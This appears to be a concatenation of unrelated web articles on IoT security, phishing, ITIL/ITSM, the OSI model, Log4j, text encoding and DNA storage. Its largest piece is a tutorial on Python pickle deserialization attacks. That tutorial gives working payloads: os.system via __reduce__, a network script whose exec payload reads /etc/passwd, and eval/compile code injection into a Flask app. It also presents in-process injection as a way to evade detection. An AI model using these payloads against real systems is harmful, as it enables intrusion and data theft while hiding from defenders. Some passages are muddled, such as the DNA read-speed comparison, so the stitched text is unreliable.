At the same time, the ubiquity of these devices has caused a surge in security threats due to a large attack surface. Attackers have exploited vulnerable IoT devices to steal data and to use them as remote bots in distributed attacks. A famous example is Mirai, malware that attacked IoT devices running Linux to form a botnet for DDoS attacks. Yet another example is the case of implantable medical devices, such as pacemakers, which were found vulnerable to cyber-attacks. Although operational technology (OT) systems are generally considered safer than IT systems, the ever-increasing convergence of physical and digital objects under the IoT umbrella is raising security concerns for industries that have long relied on closed OT systems. The question is whether security is merely an afterthought in the design process of IoT devices. A 2015 study by HPE revealed that up to 70 percent of IoT devices are vulnerable to attack due to flaws in their software, and transmitted information without encryption.

Security as an intrinsic part of the IoT
“Cybersecurity in the IT world and OT world are two different things, and in the IT world, security can be an afterthought. For example, you can buy a PC from an open market and later on you can decide to put the security software to protect your device. Therefore, at the manufacturing stage itself, you should take care of the security itself. Once, they are distributed without proper security in place, it can be a problem. People have to think of security as an intrinsic part of the development cycle than post, which has been a classical case,” says Shrikant Shitole, senior director and country head, FireEye India.
Many organizations are in the dark about the exact number of unsecured devices connected to their networks, cyber-security experts warn. According to them, to solve the cybersecurity crisis in the IoT era, an organization must take a defense-in-depth approach, involving multiple layers of security throughout the enterprise network and clear visibility and monitoring of all connected devices. “When it comes to IoT, it is very important to have the assessment of the situation. For example, when you are rolling out an app with an IoT device communicating back to your servers. So, you have to look at it holistically because you do not know what loopholes you have left. Once you understand the assessment, then you can start plugging the security holes which includes reloading patches on the operating system, applications or any communication channel which is left open. There is always a risk of a breach; but more important is that you put all mechanisms in place from a protection as well as a detection perspective,” says Shitole.

Cybersecurity approach for IoT
According to cybersecurity experts, security by design has to be a priority in IoT devices. Not only is the design of IoT infrastructure critical; it must also include regular patch updates and continuous monitoring of IoT devices. The experts say that, in order to tackle the challenges posed by IoT vulnerabilities, original equipment manufacturers (OEMs) and IT professionals should collaborate on a well-defined security strategy and understand IoT vulnerabilities from the perspective of attackers.

“IoT is going to be the next biggest challenge for the companies. While it gives a lot of advantage, it also brings in unmanageability because you have a huge number of devices on it. Generally, we see that security is an afterthought and is not limited to IoT only. So, it is required that there is a good amount of planning within the corporates by clearly articulating how they are going to manage security,” says Sivarama Krishnan, cybersecurity leader at PwC India.
Throughout modern history, technological innovation has been a catalyst for change, as emergent technologies have transformed our day-to-day lives. Technology has dramatically reshaped modern society and paved the way for amazing tools, multi-functional devices like the smartwatch and the smartphone. Computers are increasingly faster, more portable, and higher-powered than ever before.
With all of these revolutions, technology has also made our lives easier and faster, and granted us access to almost any product or service. From shopping at your favourite retailer to booking a doctor’s appointment, technology has given us boundless access to resources, putting information at our fingertips.
The modern consumer experience reflects this, as technology continues to alter how we use services and products on a regular basis. Technology now enables business and consumers to interact remotely – but what ensures that this occurs in an effective and efficient manner?
Technology increases transparency, allowing consumers to properly evaluate the brands they do business with.
Consumers are increasingly concerned with the social purpose and ethics of brands, meaning that people want to know more about the companies they choose to transact with. With the help of modern technology, consumers are able to do more research than ever before when choosing whom to engage with. The internet makes it so easy for consumers to find information that, decades ago, might have remained hidden.
Now that businesses are put under the microscope, they’re expected to be responsible in all of their decision-making and in how they conduct their business, down to where they source and distribute their products and services.
Businesses can make the most of this consumer trend, by increasing transparency through their website and social media channels. In fact, transparency has become so appealing to consumers that businesses large and small are using it now to market their products. Sole traders can build huge social media followings by demonstrating their ethical business processes as customers become invested in the brand, as a result. Large corporations can do the same, sharing information about their product sourcing, their investors and so on.
Tech enables businesses and employees to use their time more efficiently.
There’s a whole world of reasons that businesses and employees need, and are, incorporating remote-work setups into their organisations: a better work/life balance makes for a happier, more efficient workforce; families often need to manage care arrangements for children and older family members; and disabled employees may find it difficult and stressful to use public transport, particularly during peak times. This often helps to generate a more inclusive working environment, with benefits for employees and employers alike.
There is a much greater awareness of the importance of being green, and clear recognition that adopting sustainability as a working practice is no longer optional for businesses. Technology is making travelling to the office every day unnecessary, as internet access allows employees to work from wherever they are, at a time that suits them. This often leads to happier employees and increased output. For us, tech platforms like Slack are exceptionally useful, as we have employees in both Europe and North America, where the time difference is around 8 hours. Slack lets companies like ContactLenses.co.uk overcome geographic remoteness, keeping employees in constant communication and more connected than ever before.
Technology enables consumers to access products at lightning pace.
As access to information grows, consumers are demanding more from retailers. When consumers see a product they like from the other side of the world on social media, they can source it and have it shipped to them in less than a few weeks. International fashion weeks are streamed live, so there is no more waiting for the September issue of Vogue to find out the trends, and within a matter of days copycat items are available, especially when online sellers drop-ship orders from suppliers overseas. We place fast shipping high on our list of priorities, using tech to ensure our consumers receive their contact lenses as quickly as possible.
Technology streamlines and facilitates round-the-clock customer service
With the rise of eCommerce, consumers expect a high level of convenience at all stages of the shopping process. When a customer has a problem with an order, or a question about a product, they’re less likely to pick up the phone today than they were in the past. Email support is generally great and allows customers to access help when they have time, as long as the business replies promptly. It was a great solution until chatbots came along and made email look old-fashioned. Chatbots are simply programs that make customer service more efficient by asking a set of questions before passing the customer to a real-life person if necessary. Customers can converse with chatbots on company websites to get answers more quickly, and are happy when their issue is resolved. Happy customers leave great reviews, demonstrating better business practices. We love providing our users with an effective chatbot, and we can honestly say our customers are big fans too.
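The hand-off pattern described above can be sketched in a few lines (a toy illustration, not any particular vendor's product; the keywords and canned answers are invented for the example):

```python
def chatbot_reply(message: str) -> str:
    """Answer common questions; escalate anything else to a human agent."""
    canned = {
        "delivery": "Orders usually arrive within 3-5 working days.",
        "returns": "You can return unopened items within 30 days.",
    }
    for keyword, answer in canned.items():
        if keyword in message.lower():
            return answer
    # No canned answer matched: hand the conversation to a person.
    return "Let me connect you to a member of our team."

print(chatbot_reply("When is my delivery due?"))   # canned answer
print(chatbot_reply("My lenses feel uncomfortable"))  # escalates to a human
```

Real chatbots layer natural-language understanding on top of this, but the core loop of matching a question to a known answer and escalating the rest is the same.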
Technology has ushered in the dawn of the connected world, as people across the planet are able to network in ways thought unimaginable a hundred years ago. This remote connectivity has reshaped the relationship between businesses and consumers, triggering changes and generating brand-new channels for interactions to occur within. It is easy to imagine that soon there will be a number of new concepts to add to the above list; the ways in which tech enables businesses and consumers to do things remotely are ever evolving.
John Dreyer, Optometric Consultant, Contactlenses
Since the COVID-19 pandemic heavily shifted work patterns for millions of people around the world, one of the biggest changes, particularly among white-collar workers, has been a move towards working from home wherever possible. As a result, millions of employees are accessing sensitive corporate networks from outside secure office settings. Naturally enough, this creates a wonderful landscape of opportunities for cyber attacks, especially through email phishing.
How Phishing Threats Evolved Since 2020
Phishing is defined as an attempt to dishonestly obtain sensitive information, such as banking details and login credentials, typically by someone impersonating a trusted entity through digital communications. Like any aspect of IT and digital media, phishing attempts evolve. Between 2020 and 2021, they did so in two crucial ways:
First, phishing attacks are most commonly carried out through the more formal landscape of email communications. But attackers have effectively adapted their tactics to include other platforms such as social media, messaging apps and even phone calls. As long as the underlying aim of tricking someone into handing sensitive information to a source posing as legitimate is achieved, all of these digital mediums are fair game.
Secondly, the use of all these mediums–especially email–has evolved dramatically to revolve around the COVID-19 pandemic. The general atmosphere of frequent legal or political uncertainties, shifting corporate remote policies and turbulent news cycles about pandemic regulations have all caused a flood of genuine official communications related to the situation. Each of these has been an opportunity for cyber criminals to imitate authentic looking messages for their own data fraud attempts. Examples abound, including spoofed tax emails about COVID deductions, vaccine sign-ups from emails pretending to be health authorities or even messages imitating logistics companies about new payment fees or policies.
At-home employees are already stressed by changes to their work and life routines. As a result, they can be especially vulnerable to these kinds of phishing attempts, since they lack a nearby colleague who can help them tell real from fake.
Best Practices for Cutting Phishing Lines
Despite the above, phishing threats can be neutralized. Companies themselves can offer information sessions with their staff about the dangers of phishing and how it has evolved in the last year.
Other fairly economical data security countermeasures could include requesting that employees only share sensitive information or log into their work accounts through closed VPN services or with work-specific devices. Adding the use of multi-factor authentication to any devices or accounts is another robust step that many companies can implement.
Businesses can and should take a layered approach to security, with widespread email authentication and careful monitoring of communication endpoints.
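For illustration, email authentication of the kind mentioned above typically starts with DNS records. A sample DMARC policy record might look like the following (example.com and the reporting address are placeholders):

```text
_dmarc.example.com.  IN  TXT  "v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@example.com"
```

Published alongside SPF and DKIM records, a policy like this tells receiving servers to quarantine mail that fails authentication and to send aggregate reports, which makes domain spoofing in phishing campaigns considerably harder.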
Getting Help from Trained IT Professionals
Companies, such as Great Lakes Computer Corporation, are staffed by trained professionals who know how to deliver effective, strong managed IT services. Services by Gateway, such as their email security solutions, combine professional expertise with powerful AI monitoring technology to help eliminate phishing techniques such as social engineering attempts and impersonation attacks via carefully disguised false email messages. Contact us and we can help protect your business and your employees easily. | <urn:uuid:98f54821-9ad4-43d3-a3d1-83988858afa3> | CC-MAIN-2022-40 | https://greatlakescomputer.com/blog/phishing-email-attacks-on-the-rise | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00162.warc.gz | en | 0.944673 | 638 | 2.75 | 3 |
Many IT professionals refer to IT Service Management with the acronyms “ITIL” and “ITSM”, and the two terms are often used interchangeably in the information technology industry. Do they mean the same thing?
No: there is a distinction.
ITIL (Information Technology Infrastructure Library) and ITSM (Information Technology Service Management) are two distinct approaches to IT service management (IT Service Management). Because ITIL and ITSM are ever-evolving, it’s essential to stay on top of the newest developments.
Simply put, ITSM is a practice or professional discipline, whereas ITIL is a body of best practices that provides guidance for ITSM. But that’s only the beginning. By studying the history of IT organizations and how IT has evolved over time, we can learn a lot about the distinctions between the two.
What is ITSM (IT Service Management)?
According to TechTarget, “IT service management (ITSM) is a general term that describes a strategic approach to design, deliver, manage and improve the way businesses use information technology (IT).”
That is correct, but there’s a common misconception that ITSM is a software solution. In truth, ITSM is a combination of people, processes, and technology; software is just one component of an ITSM solution.
ITSM is a strategic approach to designing, delivering, managing, and improving the way information technology (IT) is used within an organization. For a company to be successful, IT Service Management must ensure that the right technology and people are employed. Read more about ITSM.
What is ITIL (IT Infrastructure Library)?
The Information Technology Infrastructure Library (ITIL) is a set of documents that serve as a foundation of best practices for developing an ITSM solution. Enterprises that support an IT infrastructure and adhere to ITIL best practices may be able to increase productivity while also lowering service management costs. Read more about ITIL.
The relationship between ITIL and ITSM
The terms ITSM and ITIL have a symbiotic relationship, and ITIL addresses all of the elements in the ITSM definition. ITSM is the method through which IT oversees the delivery of services to business customers, whereas ITIL provides the guidance on how to do so efficiently.
The differences between ITSM and ITIL
- ITSM refers to an entire organizational implementation, whereas ITIL refers to a collection of process standards that guide the supply and support of information technology services (IT services).
- ITSM refers to a collection of procedures used to manage the services delivered to end users, whereas ITIL refers to the best-practice framework for IT service management, contributing the tools and strategies required to provide those services effectively.
- ITIL is micro-focused on IT within the organization, whereas ITSM is macro-focused on the business.
- ITSM defines the "what," whereas ITIL describes the "how."
- ITIL is one of several frameworks that teach best practices for implementing information technology service management (ITSM), while ITSM is a combination of the use of that framework aligned with the various business perspectives to deliver quality information technology services.
Because ITIL is the most widely used approach to ITSM, the two are frequently conflated. ITSM and ITIL are not mutually exclusive but rather complementary to one another. IT service management (ITSM) is a collection of practices, rules, and procedures that assist in managing the services offered to end users. ITIL is a framework that teaches organizations how to adopt ITSM best practices. In short, ITIL is a set of recommendations for effective IT service management.
Start your trial with Alloy Software today
Insecure Deserialization is a class of vulnerability that affects a wide range of software. Ranked number 8 on the OWASP Top 10 (2017), it is a common issue to run into. In this article I'd like to cover the following topics:
The primary focus of this article is to introduce the concept of Python 2/3 deserialization attacks. I intend to write a part 2 focusing more on PHP.
If you’d like to follow along or see some examples, please see this GitHub repo which contains all the code I’ve used here along with explanations.
When building applications we often have to take an object that exists in memory and convert it to something we can send over the network, write to a file, or store in a database. Serialization is the concept of taking that object and converting it into a form that is safe for writing.
On the other hand, Deserialization is the process of taking that serialized data and returning it to a form we can work with in a programming language. Each language has different means of performing this function (and thus different ways to exploit it).
Almost every serialization framework or library will heavily recommend you only deserialize data that is coming from a safe location. However, what happens when developers don’t heed this warning? Or when an adversary gets through the perimeter to a location the devs thought was safe? This provides an opportunity for us to insert malicious serialized data that may have adverse effects on the software.
The impacts of Insecure Deserialization attacks range from Denial of Service (DoS), to potentially Remote Code Execution (RCE), or escalation of privileges. All of these outcomes can be very serious. At the end of this article I introduce what I feel is an untapped potentiality of deserialization attacks that could be more advantageous (if a bit difficult) for attackers.
Let’s take the following example of a simple Python program. The goal is for it to serialize the information of a song and write it to a file. After a short period of time it will then read in data from that file.
#!/usr/bin/env python3
import pickle, time

class Song:
    def __init__(self, title, length_in_seconds, singer):
        self.title = title
        self.length_in_seconds = length_in_seconds
        self.singer = singer

track1 = Song("Happy Birthday", "37", "Everyone")

# Write track metadata to file
pickle.dump(track1, open('track_file', 'wb'))

time.sleep(3)

loaded_track = pickle.load(open('track_file', 'rb'))
print(loaded_track.title)
You may notice that to do this we are using a library called pickle. Pickle is the standard Python library for serializing and deserializing data. And as the notice I linked to earlier mentioned, it has some security concerns.
It is possible to generate serialized data that will execute on the host under the privileges of the existing Python process. For example, let's create a pickle that will launch a shell command:
#!/usr/bin/env python3
import pickle, os

class SerializedPickle(object):
    def __reduce__(self):
        return (os.system, ("ls -la",))

pickle.dump(SerializedPickle(), open('malicious_pickle', 'wb'))
Now what is happening here? We are defining a class with a __reduce__ method. __reduce__ is a special method that is referenced when we are serializing data. The __reduce__ method essentially tells the pickle library how to serialize the object. Then, when we are deserializing the data, this information is used to rebuild the object.
In our case, the object that is being rebuilt is a call to os.system, which will execute the command of our choosing.
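If you are curious what the serialized data actually contains, the standard library's pickletools module can disassemble a pickle stream. This is my own illustration (not from the original post), reusing the SerializedPickle class from above:

```python
import os
import pickle
import pickletools

class SerializedPickle(object):
    def __reduce__(self):
        return (os.system, ("ls -la",))

payload = pickle.dumps(SerializedPickle())

# The disassembly shows the opcodes that resolve os.system by name,
# push the "ls -la" argument string, and invoke the call with REDUCE.
pickletools.dis(payload)
```

Note that the function and its argument are stored by name as plain strings, which is why scanning suspicious pickles for readable command strings is sometimes fruitful.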
Now if we again run our music_reader script and quickly move our malicious_pickle file, we can have our code executed on the host as shown below.
From here it makes sense how we could use this to further exploit the system. We could send ourselves a reverse shell or begin deleting data to DoS the service, etc. While poking around at some code recently, I found a deserialization bug similar to this and wondered if I could go further.
While gaining a shell is every hacker's goal, it does have some downsides. By gaining a shell on the server, you start leaving artifacts that defenders can use to detect you. The process of a reverse shell sticks out like a sore thumb, the commands you execute may show up in logs, and so on.
How can we still accomplish what we want (further pwnage) without big Blue ruining our fun?
Code Injection attacks are cool, but without a vehicle for the payload we can’t exploit them. How can we force them to work? Deserialization attacks.
By launching code injection from an Insecure Deserialization vuln, I'd like to introduce what I feel is a style of attack that is more beneficial for Red Teamers and Penetration Testers.
To illustrate this let’s look at the following example in Python 2.7 (this is important as different Python versions require different methods to exploit. More on this later).
@app.route('/')
def home():
    cPickle.loads(str(request.args.get('pickle')))
    return finished()

def finished():
    return "The function completed!"
This is a snippet of an example Flask application (you can find the full version here). This application will deserialize data it receives from the ‘pickle’ argument and then call the ‘finished’ function to display that the job is done. What if we overwrite the finished function to do something else? For this, we are going to serialize a special object.
Eval will evaluate (surprise) our code under the same namespace as the rest of the application. Meaning that when the object is deserialized and we get code execution, we can interact with variables and other data structures.
Compile will compile (again, surprise) our code into a format that eval can then execute.
The specific example above will modify the ‘finished’ function to instead return a new message.
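A payload in that style can be sketched as follows. This is my illustration rather than the post's original snippet; the injected source installs the replacement through the builtins module so the effect is easy to observe no matter which frame's globals eval happens to run under:

```python
import pickle

# Multi-line source we want to run inside the victim process. It
# redefines finished() and installs the replacement explicitly.
SOURCE = (
    "import builtins\n"
    "def finished():\n"
    "    return 'finished() has been replaced!'\n"
    "builtins.finished = finished\n"
)

class CodeInjectionPickle(object):
    def __reduce__(self):
        # eval() only accepts expressions, so the expression we hand it
        # compiles the multi-line source in 'exec' mode and then eval()s
        # the resulting code object (eval happily executes code objects).
        expr = "eval(compile({!r}, '<payload>', 'exec'))".format(SOURCE)
        return (eval, (expr,))

payload = pickle.dumps(CodeInjectionPickle())

# Victim side: deserializing the payload swaps out finished().
pickle.loads(payload)
print(finished())  # -> finished() has been replaced!
```

The eval(compile(...)) wrapping is the standard trick for smuggling statements (like a def) through an expression-only interface.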
For Python 3 things are actually a little easier. With Python 3, exec is part of the built-in functions, meaning that we only need to call a single function. Exec is similar to eval with a couple of differences; the key one is that in Python 3, exec is actually a function and not a statement. This prevented us from using it in Python 2.
Take for example this vulnerable application that listens for serialized data over the network.
#!/usr/bin/env python3
import socket, pickle

HOST = "0.0.0.0"
PORT = 9090

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    s.listen()
    connection, address = s.accept()
    with connection:
        print("My friend at ", address, " sent me some data")
        received_data = connection.recv(1024)
        pickle.loads(received_data)
Because this is Python 3 we can exploit this with the following script.
#!/usr/bin/env python3
import socket, pickle, builtins

HOST = "127.0.0.1"
PORT = 9090

class Pickle(object):
    def __reduce__(self):
        return (builtins.exec, ("with open('/etc/passwd','r') as r: print(r.readlines())",))

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
    sock.connect((HOST, PORT))
    sock.sendall(pickle.dumps(Pickle()))
Here we are opening /etc/passwd and printing its contents.
So why go through with all this work? It seems like a hassle. Well, there are some keen benefits if we play our cards right. First, because we are executing our code in the same namespace, we can do things like reference global variables, view environment variables, or modify functions. With the help of the inspect library, we could retrieve the source code of the application. Database involved? We could potentially leverage that connection to start querying the database as the application.
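To make that last point concrete: the value returned by the __reduce__ callable becomes the deserialized object itself, so a payload can even hand data straight back along the application's own code path. The sketch below is my example (not from the post) and uses inspect to leak a module's source:

```python
import pickle

class SourceLeakPickle(object):
    def __reduce__(self):
        # The return value of the eval'd expression becomes the
        # "deserialized object", so whatever it evaluates to is handed
        # back to whoever called pickle.loads().
        return (eval, ("__import__('inspect').getsource(__import__('pickle'))",))

leaked = pickle.loads(pickle.dumps(SourceLeakPickle()))
print(leaked[:60])  # first characters of the pickle module's own source
```

In a real target you would point getsource at the application's modules instead of the standard library, but the mechanism is identical.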
There are also OPSEC benefits. First, let’s compare RCE achieved through deserialization. For this, we alter our payload to use the standard Python reverse shell and take a look at the process list.
Clearly this looks pretty shady. If this gets picked up in a process list or a bash history it will throw some alarms (excluding them noticing the network traffic). On the flip side, let’s instead do code injection, and this time sleep for 20 seconds to demonstrate.
Hmmmm, nothing anomalous. Nothing strange. The app is running just like it normally would right? By using the existing application as a cover you can potentially slip through some detection or notice.
And of course from here you can do all the things you normally would with a reverse shell/beacon. Plunder files, pivot to other hosts, etc.
Obviously there are some challenges that should be mentioned. Persistence, for example, would be difficult given this setup, as you are running everything in process memory. You could theoretically modify source code; however, in today's containerized world those changes aren't likely to stick around.
You would need a unique implant for each language you are targeting, which takes time in tooling development and testing.
While I was researching to put this article together I wanted to know what language was the most susceptible to deserialization attacks (I recognize that being exploited more frequently does not necessarily correlate to being more vulnerable). In doing so I stumbled upon this post by Vickie Li. She did some really awesome research that helped me to come to an answer (or at least something vaguely close to an answer). Based on public HackerOne reports, the language with the greatest number of deserialization vulns is PHP by more than 50%!
Thus I will discuss how to perform deserialization attacks in PHP along with some code injection fun in part two of this series.
In the beginning were C and C++, and hosts of other computer programming languages. These are all based on ASCII (American Standard Code for Information Interchange), which as the name implies is based on the English alphabet. Which wouldn’t be an issue except there are lot of other humans in the world, and they don’t use the English alphabet.
So along came Unicode to the rescue. Unicode provides a framework for all alphabets of the world to be represented on computers. UTF-8 is the most popular Unicode implementation because it preserves backwards compatibility with ASCII. Which is all fun to know, but what good is it when you're looking at piles of computer files that need to be converted from ISO-8859-1 (Latin-1, Western European) into whatever encoding you prefer? Naturally, there are a number of utilities just for this task.
GNU Recode supports over 150 character sets and converts just about anything to anything. For example, there are still users of legacy Linux systems that run ISO-8859-1. Recode will convert these files to nice modern UTF-8, like this:
$ recode ISO-8859-1..UTF-8 recode-test.txt
Check out the GNU Recode Manual for instructions.
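If recode isn't installed, the same conversion is only a few lines of Python. This is an illustrative alternative (not from the original article) using just the standard library:

```python
# Re-encode a Latin-1 (ISO-8859-1) text file as UTF-8. Python decodes
# to Unicode in between, so any pair of encodings it knows will work.
def convert_file(src_path, dst_path, src_enc="iso-8859-1", dst_enc="utf-8"):
    with open(src_path, "r", encoding=src_enc) as src:
        text = src.read()
    with open(dst_path, "w", encoding=dst_enc) as dst:
        dst.write(text)
```

For bulk conversions, loop over pathlib.Path(".").rglob("*.txt") and call convert_file on each match.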
That’s fast and easy enough, but there’s one more job- converting the filename. The convmv command is just the tool for this job. This example converts all the ISO-8859-1 filenames in the files/ directory to UTF-8:
$ convmv -f iso-8859-1 -t utf8 --notest files/
convmv run without the --notest option does a dry run without changing anything, which is probably a wise thing to do first.
Maybe you have a file that you don’t know what the encoding is. Upload your file to this online tool and it will tell you. You can even do file conversions here.
The subject of character encoding is huge and bewildering, especially for us dinosaurs from the typewriter era. By golly, when you hit a typewriter key it came out the same way every single time. Wikipedia has a number of excellent introductory articles:
This article was first published on LinuxPlanet.com.
The structure of the Internet is modeled on the Open Systems Interconnection (OSI) model. The OSI model is a framework used for all communications in the cloud. The OSI model represents the interfaces and protocols used to communicate between devices. Every network device must adhere to the rules and standards that this model represents, so each device can communicate with the other devices in the network.
A representation of the model is shown in Figure 1. Each layer has a name and a layer number. The application layer at the top is layer 7 and is closest to the end user. The physical layer at the bottom is layer 1 and is closest to the computer.
Figure 1: OSI Model with Seven Layers
Host Layers of OSI Model
A web browser interacts with the application layer of the OSI model using commands supplied by the application layer to communicate. This functionality is called an Application Program Interface (API). An API contains the programming instructions, protocols, and tools used to communicate. APIs specify how software components interact with each other. Another way of looking at this process is that the browser wants to communicate with the requested website, so it formats a command for the application layer using the API and issues the command. The application layer interprets the command, verifies its syntax, and processes the command.
The next step in the OSI model is to process the command and pass it to the presentation layer. Differences in how data is represented are resolved here, including converting EBCDIC data to ASCII data. Encryption and decryption are typically handled in the presentation layer, or it can be done in the application, session, transport, or network layers.
The presentation layer ensures that information from the application layer is readable by the next layer, the session layer. As the request flows through the stack, the session layer sets up the rules needed for the two devices to communicate.
The transport layer breaks large messages into smaller chunks called segments. The other function of the transport layer is to make sure that all communications are completed successfully by using a notification process based on acknowledgments. The transport layer ensures the successful transmission and reception of the data; this assurance is called reliability.
Media Layers of OSI Model
The network layer of the OSI layer is responsible for path determination. The logical path to the destination is derived from the network address. Network addresses, or logical addresses, are normally IPv4 or IPv6 addresses.
Data Link Layer
Network layer packets are passed to the data link layer where the logical address (IP address) is converted to the Media Access Control (MAC) address of the next device in the path to the destination.
All of the information, including the data, is placed in the output buffer of the network interface card (NIC) and then transmitted onto the network media. The NIC and network media reside at the physical layer of the OSI model.
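The trip down the stack can be pictured as successive wrapping: each layer prepends its own header before handing the result to the layer below, and the receiver peels them off in the opposite order. A toy sketch (my illustration, not from the article):

```python
# Each layer on the way down wraps the data with its own header; the
# receiver strips them off in the opposite order on the way up.
LAYERS = ["application", "presentation", "session",
          "transport", "network", "data-link"]

def encapsulate(payload):
    for layer in LAYERS:
        payload = "{}|{}".format(layer.upper(), payload)
    return payload  # the outermost header belongs to the lowest layer

def decapsulate(frame):
    for layer in reversed(LAYERS):
        header = layer.upper() + "|"
        if not frame.startswith(header):
            raise ValueError("malformed frame at layer " + layer)
        frame = frame[len(header):]
    return frame
```

Real headers carry fields like ports, IP addresses, and MAC addresses rather than layer names, but the nesting order is exactly this.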
OSI Layer Functions
The message propagates over the network media. Every device that can hear the transmission will receive the message in its NIC input buffer at the physical layer of the OSI model.
The NIC passes the message to the data link layer. Once at the data link layer, the destination MAC address is evaluated to determine if the message is designated for ‘this’ physical device. If not, the message is ignored. However, if ‘this’ is the correct destination, the message is passed to the network layer.
At the network layer, the IP address is evaluated to determine if ‘this’ is the correct logical destination. If not, this is just a hop on the path to the destination. The IP address is converted into a network address, and the logical path of the next hop is determined from the routing table. The message is passed back down through the stack and transmitted out. This process is repeated until the destination is reached. If ‘this’ is the correct destination, the information is passed through the OSI model to the transport layer where all of the parts of the message are reassembled, and an acknowledgment is sent to the sender, letting the sender know that the message was received. This process is the acknowledgment function of TCP/IP.
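The "logical path of the next hop is determined from the routing table" step is a longest-prefix match: of all routes whose network contains the destination address, the most specific one wins. A minimal sketch using the standard library (illustrative only; real routers use optimized structures such as tries):

```python
import ipaddress

# Toy routing table: destination network -> next hop.
ROUTES = {
    "10.0.0.0/8": "10.255.0.1",
    "10.1.0.0/16": "10.1.0.1",
    "0.0.0.0/0": "192.168.1.254",  # default route
}

def next_hop(dst_ip):
    dst = ipaddress.ip_address(dst_ip)
    matches = [
        (ipaddress.ip_network(net), hop)
        for net, hop in ROUTES.items()
        if dst in ipaddress.ip_network(net)
    ]
    # Longest (most specific) prefix wins.
    return max(matches, key=lambda m: m[0].prefixlen)[1]
```

For example, 10.1.2.3 matches both 10.0.0.0/8 and 10.1.0.0/16, and the /16 route is chosen because it is more specific.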
The message is passed through the stack, to each succeeding layer until the application needed to resolve the request is reached, and a response is prepared. The response is then passed back through the OSI layers beginning with the application layer.
Cloud Data Centers
A cloud data center (DC) environment consists of several components that comprise its architecture. Common components include clients, one or more web APIs, and the underlying network. The network connects users to the cloud infrastructure and is responsible for interconnectivity within the cloud DC. Figure 2 illustrates the components of DCs in a cloud environment.
Figure 2: Components of Cloud Computing
A cloud DC is a mix of telecom, facilities, network appliances, network fabric, servers, and software. The client side consists of any network-ready device, such as a computer, tablet, or smartphone. The connection between the two is the Internet.
A cloud DC has the following components:
- Telecom is the hardware and services needed to connect to the Internet.
- Facilities represent the building, power, air conditioning, and water needed to house and run the equipment.
- Network Appliances include firewalls, routers, switches, SANs, and other associated networking equipment.
- Network Fabric defines all the cables used to interconnect the network equipment and the servers, as well as specialized switches designed for virtualization and storage environments.
- Servers include both physical and virtual servers that are used within the cloud infrastructure.
- Software describes the software needed in order to serve the customers.
APIs contain a set of programming instructions, protocols, and tools for accessing programs. These programs, in turn, provide the services needed to manage the DC. APIs are at the heart of cloud services.
The fabric of a DC is its network. The network provides the path or route needed for the servers, routers, switches, storage arrays, and other components to communicate. Further, the network provides the services requested by the client. It is the same fabric that allows DCs to talk to other DCs, for workload sharing and redundancy in case of disaster.
What is the Apache Log4j Vulnerability?
The Log4j vulnerability allows threat actors to execute code remotely on a targeted computer.
What is Log4j?
Log4j is a Java library for logging error messages in applications.
What is Log4j used for?
Log4j is used in both consumer and enterprise services to log security and performance information. It is used in websites, applications, and operational technology products.
What versions of Apache’s Log4j are affected by the vulnerability?
The vulnerability, known as "Log4Shell" (and sometimes "Logjam"), affects Apache's Log4j software library, versions 2.0-beta9 to 2.14.1.
Need Immediate Help?
How to protect against the Log4j vulnerability:
- Prioritize patching.
- Enumerate internet-facing endpoints that use Log4j*.
- Ensure your security operations center (SOC) is actioning alerts on these devices*.
- Install a web application firewall (WAF) with rules that automatically update so that your SOC is able to concentrate on fewer alerts*.
- Apply software updates as soon as they are available.
- If you suspect you have been affected by the Log4j vulnerability a compromise assessment will determine if threat actors have infected your environment.
- *Recommendations from CISA (https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance)
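CISA's first recommendation — enumerating the software that uses Log4j — often came down to finding JAR files that bundle the vulnerable JndiLookup class. The sketch below is illustrative only (a thorough inventory also needs to look inside nested "fat" JARs and WAR files):

```python
import zipfile
from pathlib import Path

def find_log4j_jars(root):
    """Return paths of JARs under root that contain JndiLookup.class."""
    hits = []
    for jar in Path(root).rglob("*.jar"):
        try:
            with zipfile.ZipFile(jar) as zf:
                if any(n.endswith("JndiLookup.class") for n in zf.namelist()):
                    hits.append(str(jar))
        except zipfile.BadZipFile:
            continue  # not a real zip archive; skip it
    return hits
```

A JAR is just a zip archive, which is why the standard zipfile module is enough to peek inside it.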
How can Blue Team Alpha help protect you?
Blue Team Alpha offers a wide range of cybersecurity services. Those that pertain specifically to the Log4j vulnerability are our Compromise Assessment services, part of our AlphaRisk sector. If you feel that your business has been affected by the Log4j vulnerability, do not wait. Our other services include emergency Incident Response and Remediation services, in-place Incident Response Triage and Management services, IR retainer services, Business Email Compromise services, and much more! Contact us today to learn more about how we can find and eradicate threats and protect your business.
While it seems like the stuff of science fiction, researchers have made a lot of progress over the past several years proving that synthetic DNA could make the perfect archival storage medium for files that must be retained but may rarely if ever need to be accessed again.
One of the reasons researchers hold out so much hope for DNA as a storage medium is because of its long-term stability. Solid state drives last about five years before they start to degrade, while magnetic disk might last 10 years, magnetic tape 25 years, and optical disk 25 to 35 years. In contrast, DNA can last thousands of years as long as it’s kept cool and dry.
“Researchers have been able to show that DNA as a storage medium is very power- and space-efficient. We’re talking terabytes of information in literally grams of cell matter. It’s amazing what can be stored in a small amount of DNA,” said Ray Lucchesi, president of Silverton Consulting.
The research Lucchesi is talking about started several years ago. One of the earliest projects came from a Harvard group, which successfully transferred the contents of a 53,400-word book and several images into DNA. Several other groups since have successfully encoded and stored millions of bits of data in DNA. Microsoft Research also is heavily involved in DNA research. It has been working steadily with the University of Washington, and the partnership has resulted in several breakthroughs: not only did it manage to encode 200 megabytes of digital data to synthetic DNA, but it recently found a way to add the concept of random access to files stored in DNA. Microsoft also has partnered with Twist Bioscience, which has a silicon-based DNA synthesis platform, to work on long-term data storage solutions for DNA.
Assuming that DNA could be easily writable and readable, with reasonable amounts of access time, the potential for storage is huge.
“Today we are reading megabytes or gigabytes per second off of an SSD. You could probably read 100 bytes or 200 bytes off of DNA in the same amount of time,” Lucchesi said. “That’s orders of magnitude more.”
So how does it work?
“It’s essentially the same idea as today’s storage methods,” explains Richard Hammond, technology director and head of synthetic biology at U.K.-based Cambridge Consultants. “With magnetic tape, you arrange the magnets to represent ones and zeros. With DNA, the core idea is the same; it’s a matter of arranging the information into the medium.”
